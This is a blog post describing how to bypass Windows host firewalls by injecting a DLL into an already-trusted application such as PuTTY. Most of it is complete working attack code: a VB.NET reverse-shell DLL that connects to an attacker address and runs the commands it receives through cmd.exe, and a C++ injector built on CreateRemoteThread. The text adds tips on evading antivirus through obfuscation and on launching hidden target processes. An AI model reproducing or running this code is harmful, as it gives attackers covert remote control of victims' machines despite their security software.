Bypass (Interactive) Firewalls using DLL Injection

In this post I will describe how to use DLL injection to bypass the firewall of various Windows AV solutions. The majority of the typical home-user oriented firewall software determine whether to allow an application to establish remote connections (either inbound or outbound) by several critiria such as whether the application is digitally signed, who is the developer, what it the reputation of the file in the antivirus' rating system database, whether the device is connected to a Home or Public network etc. However, in most cases, only the application itself is checked against these conditions and the loaded (or injected) libraries are ignored. Therefore, when a rule is created that allows an application to establish remote connections, the DLLs that are used by the application inherit the same rules. By using DLL injection an attacker can create a malicious DLL and inject it to another process which is already allowed through the firewall, so as to establish remote connections unhindered. In other words, due to the fact that the firewall does not differrentiate the DLL and the application, it is possbile to gain the same 'firewall privileges' as the target application.

Based on this observation, the idea is to create a malicious DLL (VB.NET) that acts as a reverse shell and use a DLL Injector (C++) to inject it to a legit application such as 'PuTTY' on a system that runs ESET Smart Security with firewall set to interactive mode (of course any other mode will work as long as the target application is allowed through the firewall).

For the DLL I used the code shown below, which is very simple but effective and most importantly undetected:

Imports System.Runtime.InteropServices
Imports RGiesecke.DllExport
Imports System.Net.Sockets
Imports System.Text
Imports System.Threading

Public Module Mod11
    Dim ShClient As New Net.Sockets.TcpClient
    Dim DataStream As NetworkStream

    <DllExport("RemShell")>
    Public Sub RemShell()
        Try
            ShClient.Connect("192.168.71.129", 9990)
            Dim RecvThr As New Thread(AddressOf ShRecv)
            RecvThr.Start()
        Catch ex As Exception : End Try
    End Sub

    Sub SendData(ByVal msg As String)
        Dim SendBytes As Byte()
        SendBytes = Encoding.ASCII.GetBytes(msg)
        DataStream = ShClient.GetStream
        DataStream.Write(SendBytes, 0, SendBytes.Length)
    End Sub

    Sub ShRecv()
        Do
            Dim ReceivedText As String = Nothing
            Dim ReceiveBytes(1023) As Byte
            Dim BytesReceived As Integer
            Do
                DataStream = ShClient.GetStream
                BytesReceived = DataStream.Read(ReceiveBytes, 0, ReceiveBytes.Length)
                If Not Encoding.ASCII.GetString(ReceiveBytes, 0, BytesReceived).EndsWith(vbLf) Then
                    ReceivedText = ReceivedText & Encoding.ASCII.GetString(ReceiveBytes, 0, BytesReceived)
                Else
                    Dim temp As String = Encoding.ASCII.GetString(ReceiveBytes, 0, BytesReceived)
                    Dim Array() As String = Split(temp, vbLf)
                    ReceivedText = ReceivedText & Array(0)
                    CMDOutput(ReceivedText)
                    Exit Do
                End If
            Loop
        Loop
    End Sub

    Sub CMDOutput(ByVal cmd As String)
        Dim p As New Process()
        p.StartInfo.FileName = "cmd.exe"
        p.StartInfo.Arguments = "/c " & cmd
        p.StartInfo.RedirectStandardError = True
        p.StartInfo.RedirectStandardOutput = True
        p.EnableRaisingEvents = True
        p.StartInfo.CreateNoWindow = True
        p.StartInfo.UseShellExecute = False
        AddHandler p.ErrorDataReceived, AddressOf proc_OutputDataReceived
        AddHandler p.OutputDataReceived, AddressOf proc_OutputDataReceived
        Try
            p.Start()
            p.BeginErrorReadLine()
            p.BeginOutputReadLine()
            p.WaitForExit()
        Catch ex As Exception
            SendData("Error: " & ex.Message)
        End Try
    End Sub
    Public Sub proc_OutputDataReceived(ByVal sender As Object, ByVal e As DataReceivedEventArgs)
        SendData(e.Data & vbLf)
    End Sub
End Module

Some notes:

We have to install the UnmanagedExports nuget package by Robert Giesecke (also have to install .NET Framework 3.5 and MS Build Tools 2015) in order export the DLL's function natively so it can be used by the injector:

You can include any code you wish on the DLL, even implement a whole RAT, however you should avoid mainstream ideas like invoking metasploit shellcodes beacuse the resulting DLL will be detected by the AV and it won't be allowed to run. At this point feel free to try encryption/packing/obfuscation techniques to bypass the AV.

For the next part we have to create the injector. The steps we have to follow in order to perform the DLL injection and invoke a remote function are the following:

Call the 'LoadLibraryA' function from the target process and load our malicious DLL to its address space:

Get the address of the 'LoadLibraryA' function from the injector app itself (it will be the same for the target process)
Allocate a new memory region inside the target process' address space to write the path of our DLL
Write the path of our DLL to the target process' newly allocated memory region. This will be defined later as the argument of the 'LoadLibraryA' function
Call 'LoadLibraryA' from the target process

Calculate the offset between the base of the DLL and the exported function and use 'CreateRemoteThread' to call it on the target process:

Get the base address of the injected DLL in the target process
Load the DLL in the injector app itself
Use 'GetProcAddress' to get the address of the exported function (in our case 'RemShell') from the injector app
Calculate the offset of the function from the base of the DLL
Add this offset to the base of the injected DLL we got earlier
Use 'CreateRemoteThread' on this address on the target application

The code of the injector can be seen below:

#include <iostream>
#include <stdio.h>
#include <string>
#include <windows.h>
#include <cassert>

LPVOID GetPayloadExportAddr(LPCWSTR lpPath, HMODULE hPayloadBase, LPCSTR lpFunctionName) {
	// Load the DLL in the virtual address space of this injector
	HMODULE hLoaded = LoadLibrary(lpPath);

	if (hLoaded == NULL) {
		return NULL;
	}
	else {

		// Use 'GetProcAddress' to get the address of the exported function (in our case RemShell)
		LPVOID lpFunc = (LPVOID)GetProcAddress(hLoaded, lpFunctionName);
		
		// Calculate the offset of the exported function from the base of the DLL
		DWORD dwOffset = (char*)lpFunc - (char*)hLoaded;

		FreeLibrary(hLoaded);
		// Add this offset to the base of the injected DLL we got earlier
		LPVOID final = LPVOID((DWORD)hPayloadBase + dwOffset);
		return final;
	}
}

BOOL InitPayload(HANDLE hProcess, LPCWSTR lpPath, HMODULE hPayloadBase, HWND hwndDlg) {
	LPVOID lpInit = GetPayloadExportAddr(lpPath, hPayloadBase, "RemShell");
	if (lpInit == NULL) {
		return FALSE;
	}
	else {

		// Use 'CreateRemoteThread' on the calculated address on the target application
		HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpInit, hwndDlg, 0, NULL);
		if (hThread == NULL) {
			return FALSE;
		}
		else {
			CloseHandle(hThread);
		}
	}

	return TRUE;
}

int main(int argc, char* argv[]) {
	// Start 'PuTTY' and get the PID based on the window title
	system("start C:\\Users\\john\\Desktop\\putty.exe");
	Sleep(2000);
	LPCWSTR windowName = L"PuTTY Configuration";
	HWND windowHandle = FindWindowW(NULL, windowName);
	DWORD* processID = new DWORD;
	GetWindowThreadProcessId(windowHandle, processID);
	std::wcout << L"Process ID of " << windowName << L" is: " << *processID << std::endl;
	if (processID != 0) {

		// Path of the target DLL to be injected
		const char* buffer = "C:\\Users\\john\\Desktop\\VBDLL\\VBDLL\\bin\\x86\\Release\\VBDLL.dll";
				
		int procID = *processID;
		HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
		if (process == NULL) {
			printf("Couldn't find the specified process\n");
			exit(EXIT_FAILURE);
		}

		// Get the address of the 'LoadLibraryA' function from this injector app (it will be the same for the target process)
		LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
		if (addr == NULL) {
			printf("Couldn't find the LoadLibraryA function\n");
			exit(EXIT_FAILURE);
		}
				
		// Allocate a new memory region inside the target process' address space to write the path of our DLL
		LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
		if (arg == NULL) {
			printf("Couldn't allocate memory inside the chosen process\n");
			exit(EXIT_FAILURE);
		}

    // Write the path of our DLL to the target process' newly allocated memory region
    // This will be defined later as the argument of the LoadLibraryA function
		int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL);
		if (n == 0) {
			printf("Couldn't write to the target process' address space\n");
			exit(EXIT_FAILURE);
		}
				
		// Call 'LoadLibraryA' from the target process to force load our DLL
		HANDLE hThread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL);
		if (hThread == NULL) {
			printf("Couldn't create the remote thread\n");
			exit(EXIT_FAILURE);
		}
		
		// hInjected is the base address of the injected DLL
		HMODULE hInjected;
		if (hThread != 0) {
			WaitForSingleObject(hThread, INFINITE);
			GetExitCodeThread(hThread, (LPDWORD)&hInjected);
			CloseHandle(hThread);

			BOOL test = InitPayload(process, L"C:\\Users\\john\\Desktop\\VBDLL\\VBDLL\\bin\\x86\\Release\\VBDLL.dll", hInjected, NULL);
			
		}
		else {
			exit(EXIT_FAILURE);
		}
		getchar();
	CloseHandle(process);
	return 0;
	}
}

Some notes:

In the injector we can also implement any additonal features we want, such as to search for applications that will most likely be allowed to access the internet, check which AV is run, compile the DLL dynamically etc.
IF you want to call a specific DLL function, like in this example, the above code works only for 32-bit. If you want to target a 64-bit application you cannot use a specific exported DLL function, but you can place your code in DLLMain and it will be executed after the remote call to 'LoadLibraryA'.
In essence for the injection to take place all we need is a target process, so if the target application is not already running we can simply launch a hidden instance.

Let's test it in action:

First start a listening netcat server:

Then start the injector application, which will start 'PuTTY' and inject the DLL:

As you can see the DLL is injected and the firewall, which is set to interactive mode, asks whether to allow 'PuTTY' to connect or not. Supossing that the victim has already used the target application once and that it has a rule which allows outbound connections, the reverse shell would be established without warning at all.

Back on the attacker's system we have a reverse shell:

Last updated 3 months ago